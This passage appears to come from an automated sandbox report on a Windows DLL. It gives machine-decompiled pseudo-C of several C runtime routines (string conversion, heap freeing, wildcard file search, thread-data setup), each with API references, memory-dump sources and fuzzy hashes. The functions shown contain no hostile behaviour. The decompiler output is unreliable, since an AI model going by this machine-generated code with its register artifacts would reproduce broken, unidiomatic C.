				_t86 = E6EDA7DC9(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E6EDA3753(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E6EDA9C5B(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E6EDA7DC9(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E6EDA854D(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E6EDA854D(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E6EDA9C5B(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E6EDA7E45();
									if(_t95 != 0) {
										E6EDA9C5B(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E6EDA8E8F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E6EDAD5B0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E6EDA854D(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E6EDA8E8F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E6EDAD5B0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

APIs

__alloca_probe_16.LIBCMT ref: 6EDA9CFF
__alloca_probe_16.LIBCMT ref: 6EDA9DC5
__freea.LIBCMT ref: 6EDA9E31

Part of subcall function 6EDA8E8F: HeapAlloc.KERNEL32(00000000,6EDA8BCE,6EDA8BCE,?,6EDA78FA,00000220,?,6EDA8BCE,?,?,?,?,6EDAACE2,00000001,?,?), ref: 6EDA8EC1

__freea.LIBCMT ref: 6EDA9E3A
__freea.LIBCMT ref: 6EDA9E5F

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 9f559567173ad50c3de5f75a3485a26f4db015252c8950aa0b290ac259457076
Instruction ID: 5c32088a26fbb341d4979bf2653f5a95664f16d2fb1137ed1f22b86c45f84206
Opcode Fuzzy Hash: 9f559567173ad50c3de5f75a3485a26f4db015252c8950aa0b290ac259457076
Instruction Fuzzy Hash: 9C51BF7260121AEBEF118FECEC40EAF3AAEDF45664F114528FE14A6144E736DF5186A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAB227, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDAB227(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6edc36f8; // 0x6edc3748
					if(_t23 != 0) {
						E6EDA6B43(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6edc36fc; // 0x6edc4270
					if(_t24 != 0) {
						E6EDA6B43(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6edc3700; // 0x6edc4270
					if(_t25 != 0) {
						E6EDA6B43(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6edc3728; // 0x6edc374c
					if(_t26 != 0) {
						E6EDA6B43(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6edc372c; // 0x6edc4274
					if(_t27 != 0) {
						return E6EDA6B43(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 6EDAB23F

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDAB251
_free.LIBCMT ref: 6EDAB263
_free.LIBCMT ref: 6EDAB275
_free.LIBCMT ref: 6EDAB287

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4dc66762906608b7d2120950156a072b5204c8cf7153be9f9603e5c5f5d284d0
Instruction ID: 4f86aae5ec0ac05a957316734004ada05aece181bf6bb0dd1ae66de2198e89bd
Opcode Fuzzy Hash: 4dc66762906608b7d2120950156a072b5204c8cf7153be9f9603e5c5f5d284d0
Instruction Fuzzy Hash: A8F03C71414A0ADB8A40DBEDD19DC5E73DEEB057947640C4AF274D7680DB30FB8146A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6D35, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6EDA6D35(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = L6EDA5A41(_t136, _t222, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6EDA9A57(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6EDA6A26();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6EDA6AE6(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6EDA9A57(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6EDA7327(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6EDA6B43(_t300);
														_t302 = _v12;
													}
													E6EDA6B43(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6EDA9A57(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6EDA6A26();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6edc3004; // 0xece3dae
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6EDA9AB0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6EDA6D16(_t244 - _t287 + 1, _t287,  &_v676, E6EDA7232(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6EDA6C47( &(_v608.cFileName),  &_v640,  &_v609, E6EDA7232(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6EDA6B43(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6EDA6B43(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6EDA9560(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6EDA6B7D);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6EDA6B43(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6EDA3753(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6EDA6B43(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6EDA9A70(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6EDA6B43( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6EDA6B43(_t283);
						goto L31;
					}
				} else {
					_t219 = E6EDA6AD3(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6EDA6A16();
					L31:
					return _t297;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 6EDA6ECF

Strings

*?, xrefs: 6EDA6D78

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction ID: e1070638529c187796340fa20bd838e3221bf682d6b0747690c8614af50a946a
Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction Fuzzy Hash: E3610875E10219DF9B14CFEDC8805EDFBB9EF48314B14856AE925E7344E731AB418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6C47, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA6C47(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6EDA7E45(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6EDA7E45(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6EDA6A9D(GetLastError());
									_t19 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6EDA728D(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6EDA6A9D(GetLastError());
						return  *((intOrPtr*)(E6EDA6AD3(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6EDA728D(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6EDA7273(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 6EDA7273: _free.LIBCMT ref: 6EDA7281

Part of subcall function 6EDA7E45: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6EDA9E27,?,00000000,00000000), ref: 6EDA7EE7

GetLastError.KERNEL32 ref: 6EDA6CAF
__dosmaperr.LIBCMT ref: 6EDA6CB6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EDA6CF5
__dosmaperr.LIBCMT ref: 6EDA6CFC

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dda431e8a7a8ea1c58e9daa232c37f68659e9a1df2175a6f0be5c58d92ce7235
Instruction ID: e80b2436ebaf3034afb7f49617da40680e3dd696cddaf54532931a7e1fd7d5ac
Opcode Fuzzy Hash: dda431e8a7a8ea1c58e9daa232c37f68659e9a1df2175a6f0be5c58d92ce7235
Instruction Fuzzy Hash: C621F472624205FF9B509FEDCC8095F7BADEF013A87108928FA7597184D772EE4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6543, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6EDA6543(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6edc3050; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EDA84C0(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6EDA6AE6(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t51);
							if(__eflags != 0) {
								E6EDA6341(_t51, 0x6edc424c);
								E6EDA6B43(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6EDA84C0(__eflags,  *0x6edc3050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6EDA84C0(0,  *0x6edc3050, 0);
							_push(0);
							L9:
							E6EDA6B43();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6EDA8481(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6edc3050; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6EDA6048(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6edc3050; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6EDA84C0(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6EDA6AE6(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t60);
								if(__eflags != 0) {
									E6EDA6341(_t60, 0x6edc424c);
									E6EDA6B43(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6EDA84C0(__eflags,  *0x6edc3050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6EDA84C0(__eflags,  *0x6edc3050, _t20);
								_push(_t60);
								L25:
								E6EDA6B43();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6EDA8481(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6edc3050; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6EDA6048(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6edc3050; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6EDA84C0(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6EDA6AE6(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t54);
											if(__eflags != 0) {
												E6EDA6341(_t54, 0x6edc424c);
												E6EDA6B43(0);
												goto L45;
											} else {
												_t40 = 0;
												E6EDA84C0(__eflags,  *0x6edc3050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6EDA84C0(0,  *0x6edc3050, 0);
											_push(0);
											L41:
											E6EDA6B43();
											goto L36;
										}
									}
								} else {
									_t54 = E6EDA8481(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6edc3050; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
